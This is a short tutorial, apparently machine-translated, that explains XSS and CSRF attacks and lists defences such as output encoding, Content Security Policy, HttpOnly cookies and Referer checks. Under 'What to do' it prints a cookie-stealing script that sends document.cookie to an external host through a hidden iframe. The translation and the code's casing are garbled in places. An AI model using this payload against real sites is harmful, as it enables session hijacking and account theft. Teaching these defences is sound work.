How XSS and CSRF attacks are protected

XSS: Cross-site scripting (Cross-site scripting, often referred to as XSS) is a security vulnerability attack for Web site applications and is a form of code injection. It allows malicious users to inject code into a Web page, and other users will be affected when they view the page. Such attacks typically include HTML and client-side scripting languages.

CSRF: Cross-site requests forgery (English: Cross-site request forgery), also known as One-click attack or session riding, is usually abbreviated as CSRF or XSRF, is a compelling user in the currently logged on web should An attack method that performs a non-intended operation on a program.

The simple understanding is:

XSS: Through the client-side scripting language (most commonly: JavaScript)
Posting a malicious JavaScript code in a forum post is a script injection, and if the code content requests an external server, it's called xss!.

CSRF: Also known as XSRF, impersonate the user to initiate the request (in the case of users without knowledge), to complete a number of requests against the user's wishes (such as malicious postings, delete posts, change passwords, email, etc.).

What to do

Use <script type= "Text/javascript" ></script> wrap up in Comments (function (window, document) {    //URL to construct leaked information    var cookies = document.cookie;    var xssuribase = "http://********";    var Xssuri = xssuribase + window.encodeuri (cookies);    Create a hidden iframe for communication    var hideframe = document.createelement ("iframe");    hideframe.height = 0;    hideframe.width = 0;    HideFrame.style.display = "None";    HIDEFRAME.SRC = Xssuri;    commenced    Document.body.appendChild (hideframe);}) (window, document);

How to Protect

Central idea: All of the external sources of data, all of our service-side code to filter, to let him display on the page, that is, all external data is illegal, must do a good filter.

1. Try to use InnerText (IE) and Textcontent (Firefox), which is jquery's text (), to output text content
2. Must use innerHTML and so on function, then need to do php-like htmlspecialchars filter

3. When outputting HTML, add the HTTP Header
of the Content Security policy (function: To prevent the page from being embedded in a third-party script file, etc.)
(bug: IE or a lower version of the browser may not be supported)
4. When setting a cookie, add the HttpOnly parameter
(function: Can prevent the page from XSS attack, cookie information is stolen, can be compatible to IE6)
(flaw: the website itself JS Code also cannot operate the cookie, and the function is limited, Only guarantee the security of cookies)
5. When developing the API, verify the Referer parameters of the request
(function: Can prevent CSRF attacks to a certain extent)
(bug: IE or a lower version of the browser, referer parameters can be forged)